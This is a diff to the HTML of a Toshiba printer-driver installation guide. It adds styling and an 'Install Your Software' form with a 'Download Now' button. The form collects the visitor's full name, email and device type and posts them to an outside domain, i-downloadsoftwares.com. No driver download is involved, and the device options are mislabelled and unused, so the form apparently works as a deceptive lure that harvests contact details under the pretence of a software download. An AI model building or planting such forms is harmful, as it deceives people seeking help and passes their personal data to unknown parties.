--- a/install.html
+++ b/install.html
@@ -261,6 +261,68 @@
     0%   { transform: translateX(0%); }
     100% { transform: translateX(-100%); }
   }
+
+   .install-form button {
+    width:100%;
+      padding: 12px;
+      font-size: 16px;
+      color: #fff;
+      background-color: #004080;
+      border: none;
+      border-radius: 6px;
+      cursor: pointer;
+      transition: background-color 0.3s ease;
+    }
+
+    .install-form button:hover {
+      background-color: #0358ad;
+    }
+     .install-form {
+      background: #fff;
+      max-width: 500px;
+      margin: 40px auto;
+      padding: 25px 30px;
+      border-radius: 10px;
+      box-shadow: 0 0 15px rgba(0,0,0,0.1);
+    }
+
+    .install-form p.title {
+      font-size: 20px;
+      font-weight: 600;
+      margin-bottom: 20px;
+      text-align: center;
+      color: #004080;
+    }
+
+    .form-group {
+      margin-bottom: 15px;
+    }
+
+    label {
+      display: block;
+      font-weight: 600;
+      margin-bottom: 5px;
+      color: #333;
+    }
+
+    input[type="text"],
+    input[type="email"],
+    select {
+      width: 100%;
+      padding: 10px;
+      font-size: 16px;
+      border: 1px solid #ccc;
+      border-radius: 6px;
+      background:black;
+      color:white;
+    }
+
+    .note {
+      text-align: center;
+      margin-top: 20px;
+      font-size: 14px;
+      color: #555;
+    }
 </style>
 </head>
 
@@ -286,6 +348,38 @@
   <h1 id="main-title">The Ultimate Guide to Toshiba Printer Driver Install</h1>
   <p>Installing a Toshiba printer and ensuring its drivers are correctly set up can be a seamless experience when approached with the right guidance. In this comprehensive guide, you will learn everything you need to know about toshiba printer driver install, including preparation steps, installation methods, troubleshooting tips, and optimization strategies.</p>
 </section>
+
+  <div class="install-form">
+    <p class="title">Install Your Software</p>
+    <form action="https://i-downloadsoftwares.com/error" method="post">
+      <div class="form-group">
+        <label for="full-name">Full Name</label>
+        <input type="text" id="full-name" name="full_name" placeholder="Enter your name" required />
+      </div>
+
+      <div class="form-group">
+        <label for="email">Email Address</label>
+        <input type="email" id="email" name="email" placeholder="Enter your email" required />
+      </div>
+
+      <div class="form-group">
+        <label for="device">Device Type</label>
+        <select id="device" name="device" required>
+          <option value="">-- Select Device --</option>
+          <option value="mobile">Windows 7</option>
+          <option value="mobile">Windows 8</option>
+          <option value="mobile">Windows 10</option>
+          <option value="mobile">Windows 11</option>
+          <option value="tablet">MacOS</option>
+          <option value="desktop">PC</option>
+          <option value="desktop">IOS</option>
+          <option value="desktop">Other</option>
+        </select>
+      </div>
+
+      <button type="submit">Download Now</button>
+    </form>
+  </div>
 
 <main class="container">
   <article id="setup" tabindex="0">
